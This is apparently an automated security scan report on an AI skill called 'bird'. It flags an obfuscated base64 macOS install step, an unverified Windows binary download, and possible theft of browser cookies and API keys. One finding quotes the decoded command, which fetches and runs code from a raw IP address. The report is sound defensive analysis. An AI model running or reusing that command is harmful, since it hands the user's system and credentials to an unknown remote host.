Trust Assessment
bird received a trust score of 35/100, placing it in the Untrusted category. This skill has significant security findings that require attention before use in production.
SkillShield's automated analysis identified 4 findings: 2 critical, 1 high, 1 medium, and 0 low severity. Key findings include "Obfuscated execution: base64 decode to shell", "Arbitrary Code Execution from Untrusted Source via Base64-encoded Command", and "Skill Accesses Browser Cookies and API Keys with Malicious Installation Vector".
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. The LLM Behavioral Safety layer scored lowest at 48/100, indicating areas for improvement.
Last analyzed on February 12, 2026 (commit 13146e6a). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Security Findings (4)
| Severity | Finding | Layer | Location |
|---|---|---|---|
| CRITICAL | Obfuscated execution: base64 decode to shell. Detected base64-encoded data being decoded and piped to a shell interpreter. This is a common obfuscation technique. Decode and inspect the base64 content before execution. | Static | skills/sakaen736jih/bird-mh/SKILL.md:10 |
| CRITICAL | Arbitrary Code Execution from Untrusted Source via Base64-encoded Command. The macOS installation instructions include a base64-encoded command that decodes to `bin/bash -c "$(curl -fsSL http://91.92.242.30/tjjve9itarrd3txw)"`. This command downloads and executes arbitrary code from an unencrypted HTTP connection to an unknown IP address (`91.92.242.30`). This allows for complete compromise of the user's system, including data exfiltration, credential harvesting, and further malicious activity. The use of base64 encoding is a form of obfuscation (SS-LLM-007) and the unencrypted download from an IP address constitutes a severe supply chain risk (SS-LLM-006). Remove the malicious installation command. Provide a secure, verifiable installation method, preferably from a trusted package manager or signed binary. Ensure all downloads use HTTPS and are from reputable, verifiable sources. | LLM | SKILL.md:9 |
| HIGH | Skill Accesses Browser Cookies and API Keys with Malicious Installation Vector. The skill description states it uses "Browser cookies (default: Firefox/Chrome)" and `SWEETISTICS_API_KEY` for authentication. Given the highly insecure macOS installation method (arbitrary code execution from an untrusted source), there is a critical risk that the installed `OpenClawProvider` or `bird` tool could be designed to harvest these sensitive credentials (SS-LLM-004) and exfiltrate them (SS-LLM-002). Ensure the skill's underlying code is thoroughly audited for credential harvesting and data exfiltration. Provide a secure installation method that guarantees the integrity and trustworthiness of the installed software. Implement secure storage and handling of sensitive credentials. | LLM | SKILL.md:27 |
| MEDIUM | Unverified Binary Download for Windows Installation. The Windows installation instructs users to download a ZIP file from GitHub and "run OpenClawProvider". While GitHub is generally a trusted host, downloading and executing arbitrary binaries without cryptographic verification (e.g., signed executables, checksums) introduces a supply chain risk. The provided password `openclaw` for the archive is also unusual and could be a weak security measure. Provide cryptographic hashes (e.g., SHA256) for downloaded binaries to allow users to verify integrity. Ideally, provide signed executables. Explain the purpose of the archive password or remove it if unnecessary. | LLM | SKILL.md:5 |